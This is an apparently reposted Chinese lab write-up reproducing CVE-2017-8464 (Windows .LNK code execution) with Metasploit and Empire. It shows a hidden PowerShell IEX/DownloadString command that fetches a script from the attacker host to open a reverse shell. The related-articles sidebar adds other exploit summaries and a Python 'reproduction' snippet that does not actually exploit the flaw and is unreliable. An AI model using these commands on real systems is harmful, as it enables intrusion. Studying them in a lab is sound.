[Shell]CVE-2017-8464漏洞复现

最新推荐文章于 2024-09-04 10:17:13 发布
最新推荐文章于 2024-09-04 10:17:13 发布
阅读量340 收藏 1
点赞数
文章标签: 操作系统 shell 运维
原文链接:http://www.cnblogs.com/-mo-/p/11442815.html
版权

0x01 漏洞原理

Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。

于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 .LNK 文件后就会被黑客所控制。

成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。

0x02 受影响版本

windows 7(32/64位)
windows 8(32/64位)
windows 8.1(32/64位)
windows 10(32/64位,RTM/TH2/RS1/RS2)
windows server 2008(32/64位/IA64)
windows server 2008 R2(64位/IA64)
windows server 2012
windows server 2012 R2
windows server 2016
windows Vista

0x03 漏洞利用1

运用Metasploit对目标主机所存在的漏洞进行利用。选用multi/handler监听模块,利用后可获取shell。

首先我们要准备好CVE-2017-8464的复现环境,kali虚拟机和windows server2008。

攻击机:kali IP:192.168.137.133

靶机:windows server2008 IP:192.168.137.132

3.1 打开kali终端,生成一个powershell文件

1561366-20190901164513978-373973177.png

3.2 然后将生成的文件移动至/var/www/html目录下

1561366-20190901164551169-1783468558.png

3.3 开启apache服务

1561366-20190901164608998-1733479170.png

3.4 在网页尝试访问一下
1561366-20190901164642193-313909930.png

3.5 访问没有问题,我们启动MSF,使用监听模块multi/handler,并配置好对应选项

1561366-20190901164806129-1842873674.png

3.6 然后开始监听
1561366-20190901164817643-569138345.png

3.7 然后我们切换到windows server2008,创建一个快捷方式

我们在这里输入构造好的路径代码:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"

1561366-20190901164903375-1676742018.png

3.8 点击下一步,然后点击完成,生成的就是一个powershell快捷方式

1561366-20190901164916310-848200813.png

3.9 我们双击运行一下快捷方式,因为这个快捷方式秒退,无法截图,所以这里

就不贴图了,双击大家都会。然后我们切回kali虚拟机,发现已经反弹到了shell

1561366-20190901164936497-1756543326.png

1561366-20190901164949864-1680418688.png

0x04 漏洞利用2

4.1 使用Empire工具对Win10系统进行攻击,如下图所示:

1561366-20190901165103211-551835234.png

4.2 这里会发现,帝国工具与msf有着差不多的样子。

然后我们使用Windows能够识别的脚本,即生成 .bat文件,然后立刻会存放在/tmp 下:

1561366-20190901165132637-72691679.png

4.3 使用记事本打开bat脚本时,可以看到,恶意二进制代码使用base64加密:

1561366-20190901165209580-1816973982.png

4.4 将这个名为launcher.bat的文件在Windows中运行起来时,回到监听端口就可以看到目标主机已经上线 :

1561366-20190901165237001-1372641431.png

4.5 如此,Windows就获得了当前用户权限:
1561366-20190901165303801-364365482.png

0x05 参考链接

1.CVE-2017-8464漏洞复现

2."震网三代" CVE-2017-8464 关于Powershell 漏洞复现

转载于:https://www.cnblogs.com/-mo-/p/11442815.html

baguangman5501
关注
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1717
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
qaq517384的博客
09-06 245
vulhub msf
CVE-2017-8464(远程执行命令)漏洞复现
RongChun的博客
01-04 1082
漏洞复现: 利用原理: 创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。 漏洞影响范围: • Microsoft Windows 10 Version 1607 for 32-bit Systems • Microsoft Windows 10 Version 1607 for x64-based Systems • Microsoft Windows 10 for 32-b...
CVE-2017-8464远程命令执行漏洞(震网漏洞复现
kuiguowei的博客
01-16 1900
2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何
weblogic-cve-2023-21839漏洞复现-kali
最新发布
gasdfjjdjdjrje_的博客
09-04 325
CVE-2023-21839 是 Oracle WebLogic Server 中 T3 协议的漏洞。T3 协议是一种用于 Java 对象的远程方法调用(RMI)的内部协议,通常用于服务器间通信和客户端与服务器的交互。攻击者利用该漏洞可以发送恶意的序列化数据,导致服务器在处理数据时执行任意代码。由于 WebLogic 支持通过 T3 协议远程访问,这使得此漏洞极其危险,因为攻击者无需身份验证即可远程触发。
CVE-2021-41773&&CVE-2021-42013复现
weixin_42345596的博客
10-09 4896
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
CVE-2017-8464漏洞复现
我的学习笔记
02-28 1155
感谢学长分享复现的技术文档,十分感谢。在线免费实验:http://www.hetianlab.com/expc.do?ec=ECIDee9320adea6e0620170831142939000011、资源:http://www.phpstudy.net/a.php/211.html2、本次测试使用了win10和kali最新版。下载安装phpstudy到...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
CVE-2017-8464复现
qq_41772873的博客
03-02 1123
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
CVE-2017-8464复现(震网三代)
小赵同学的博客
01-17 461
CVE-2017-8464复现(震网三代) 影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 1. 漏洞利用与复现 环境: 攻击机kali:192.168.228.128 靶机window10 192.168.228.129 Kali终端输入
winCVE-2017-8464漏洞复现
weixin_44664530的博客
04-27 255
影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 复现 需下载工具https://github.com/rapid7/metaspl...
【web安全】CVE漏洞复现
weixin_46301214的博客
11-22 635
漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件。当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件。【CVE-2018-1273】springboot漏洞 - RCE。【CVE-2018-1273】springboot漏洞 - RCE。POC:篡改post传参的输入命令即可触发RCE。云服务器开启端口监听,然后执行一下文件即可。存在路径后,随便输入点东西,然后抓包。特点:无回显触发RCE。先扫路径:/users。
【网络安全】CVE漏洞分析以及复现
Android_wxf的博客
04-21 1805
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
CVE漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 731
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。进入MSF框架,search CVE-2014-3120,然后进入对应模块,设置好参数即可攻击。本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场。检测环境端口是否开放。
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3302
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
两个CVE漏洞复现
qq_44704184的博客
07-14 2349
简单复现两个漏洞
[CVE-2017-8464]Microsoft Windows远程命令执行漏洞复现
weixin_30237719的博客
06-16 293
版权声明:本文为博主的原创文章,未经博主同意不得转载 前言 记录下自己的复现,保留意见 2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,分别存在于LNK文件和Windows Search功能中。黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 概述 微软的...
CVE-2017-8464 python复现代码
06-13
CVE-2017-8464是Windows Shell中的一个漏洞,可以被利用来执行恶意代码。以下是Python的复现代码: ```python import os import sys # 首先检查是否为Windows系统 if not sys.platform.startswith('win'): print("This exploit only works on Windows!") sys.exit(1) # 创建一个.lnk文件,将目标文件的路径写入其中 target = input("Enter the full path of the target file: ") shortcut = input("Enter the full path of the shortcut file to create: ") with open(shortcut, 'w') as lnk: lnk.write('[InternetShortcut]\nURL=file:///' + target) # 使用Windows Shell执行.lnk文件 os.startfile(shortcut) print("Exploit completed!") ``` 这段代码会要求用户输入目标文件的完整路径和要创建的快捷方式文件的完整路径,然后创建一个.lnk文件,并将目标文件的路径写入其中。最后,使用Windows Shell执行.lnk文件,从而执行恶意代码。请注意,为了执行此漏洞,需要在目标计算机上手动运行生成的.lnk文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值